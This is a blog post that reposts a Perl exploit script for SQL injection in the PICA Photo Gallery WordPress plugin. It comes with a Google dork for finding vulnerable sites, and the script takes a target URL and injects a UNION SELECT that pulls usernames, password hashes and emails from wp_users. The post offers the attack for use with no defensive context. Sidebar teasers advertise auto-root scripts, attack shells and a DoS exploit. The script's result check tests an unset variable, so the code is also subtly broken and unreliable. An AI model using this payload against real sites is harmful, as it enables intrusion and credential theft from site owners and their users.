J2TEAM Security: A must-have extension for Chrome users. Install now!

WordPress - PICA Photo Gallery Automatic SQL Injection (perl)

WordPress - PICA Photo Gallery Automatic SQL Injection (perl) | Juno_okyo's Blog
1 min read
# Exploit title: WordPress - PICA Photo Gallery Automatic SQL Injection (perl)
# Author: D35m0nd142
# Software Link: http://www.apptha.co...A-Photo-Gallery
# Google Dork: intext:"Powered by Apptha." inurl:gallery
# Thanks to Da0ne


#!/usr/bin/perl  
use LWP::UserAgent;
system("clear");
print "***********************************************\n";
print "* WordPress - PICA Photo Gallery SQLi exploit *\n";
print "*                 Created by D35m0nd142                     *\n";
print "***********************************************\n\n";
print "Enter the target --> ";
chomp(my $target=<STDIN>);
$table_name="wp_users";
$agent = LWP::UserAgent->new() or die "Error!\n";
$agent->agent('Mozilla/5.0 (Windows NT 6.1; WOW64; rv:7.0.1) Gecko/20100101 Firefox/7.0.1');
$host = $target . "/pica-gallery/?aid=-1+union+select+concat(user_login,0x3a,user_pass,0x3a,user_email),2,3,4+from+wp_users-";
$request = $agent->request(HTTP::Request->new(GET=>$host));
$result = $request->content;
if ($ok1 =~/([0-9a-fA-F]{32})/){
print "[+] Password found --> $1\n\n";
sleep 1;
}
else
{
print "No password found :(\n";
}
Leader at J2TEAM. Website: https://j2team.dev/

Bạn có thể thích những bài đăng này

  • Download: http://www.mediafire.com/?oae19g9qi3krcoe Password: junookyo…
  • Step one: Download ActivePerl, but clicking the link below: Code: http://downloads.activestate.com/ActivePerl/releases/5.10.1.1007/ActivePerl-5.10.1.1007-MSWin32-x64-291969.msi …
  • Auto root 2013 Developped by Mauritania Attacker www.mauritania-sec.com https://www.facebook.com/mauritanie.forever Usage:- chmod 777 the script for example r00t.php and then launc…
  • Nói đến local là nói đến shell, không có shell thì chỉ local bằng niềm tin. Hôm nay soleil giới thiệu một số loại shell thông dụng không thể thiếu trong local attack. Một số shell …
  • # Exploit title: WordPress - PICA Photo Gallery Automatic SQL Injection (perl) # Author: D35m0nd142 # Software Link: http://www.apptha.co...A-Photo-Gallery # Google Dork: intext:"P…
  • #!/usr/bin/env python #Exploit Title: Netcut Denial of Service Vulnerability #Author: MaYaSeVeN #Blog: http://mayaseven.blogspot.com #PoC: Video http://www.youtube.com/user/mayas…

Đăng nhận xét

Cảm ơn bạn đã đọc bài viết!

- Bạn có gợi ý hoặc bình luận xin chia sẻ bên dưới.

- Hãy viết tiếng Việt có dấu nếu có thể!